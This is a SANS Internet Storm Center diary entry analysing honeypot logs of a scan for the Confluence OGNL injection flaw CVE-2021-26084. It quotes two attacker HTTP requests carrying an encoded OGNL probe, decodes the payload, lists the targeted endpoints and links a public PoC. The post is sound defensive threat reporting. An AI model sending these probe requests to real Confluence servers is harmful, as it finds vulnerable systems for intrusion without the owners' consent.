My next class:

Internet Wide Scan Fingerprinting Confluence Servers

Published: 2023-02-22. Last Updated: 2023-02-22 13:54:55 UTC
by Johannes Ullrich (Version: 1)
2 comment(s)

Looking over some of our honeypot logs today, I noticed one IP address, 60.223.74.99, scanning for several older Confluence vulnerabilities. confluence fingerprint icon

Confluence is the collaboration component of Atlassian's suite of developer tools [1]. Attacks against developers, and the tools they are using, are on the rise in general, and this is yet another "piece to the puzzle." A quick search using NIST's NVD shows 18 vulnerabilities in Confluence [2].

The scans use a known PoC exploit for CVE-2021-26084, an OGNL injection vulnerability[3].

Here are two sample requests sent by the attacker:

POST /users/user-dark-features HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57


queryString=aaaa%5Cu0027%2B%7B506%2A5210%7D%2B%5Cu0027bbb
 

POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

queryString=aaaa%5Cu0027%2B%7B3304%2A9626%7D%2B%5Cu0027bbb

 

All endpoints hit by the attacker:

/confluence/pages/createpage-entervariables.action
/confluence/pages/createpage-entervariables.action?SpaceKey=x
/pages/createpage.action?spaceKey=myproj
/pages/createpage-entervariables.action
/pages/createpage-entervariables.action?SpaceKey=x
/pages/doenterpagevariables.action
/pages/templates2/viewpagetemplate.action
/template/custom/content-editor
/templates/editor-preload-container
/users/user-dark-features
/wiki/pages/createpage-entervariables.action
/wiki/pages/createpage-entervariables.action?SpaceKey=x

The payload string decodes to:

aaaa'{506*5210}'bbb

The likely goal is to have the system return the result of the math problem to see if it is vulnerable to this attack.

No scans were seen from that source IP until today. It appears to be an otherwise unremarkable IP address allocated to what looks like a China Unicom consumer. It may be a CGNAT address used by China Unicom.

 

[1] https://www.atlassian.com/software/confluence
[2] https://nvd.nist.gov/vuln/search/results?form_type=Basic&results_type=overview&query=cpe%3A2.3%3Aa%3Aatlassian%3Aconfluence_data_center&search_type=all&isCpeNameSearch=false
[3] https://github.com/alt3kx/CVE-2021-26084_PoC

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

2 comment(s)
My next class:

Comments

Suggest the keyword spelling be corrected to Atlassian (two ‘s’) for accuracy.

Perhaps this is a follow up scan to the recent Atlassian breach?
This old script might have been used in this scan: https://blog.csdn.net/haoaaao/article/details/124542619
Same UA, same headers, same pages targeted, same query.

Diary Archives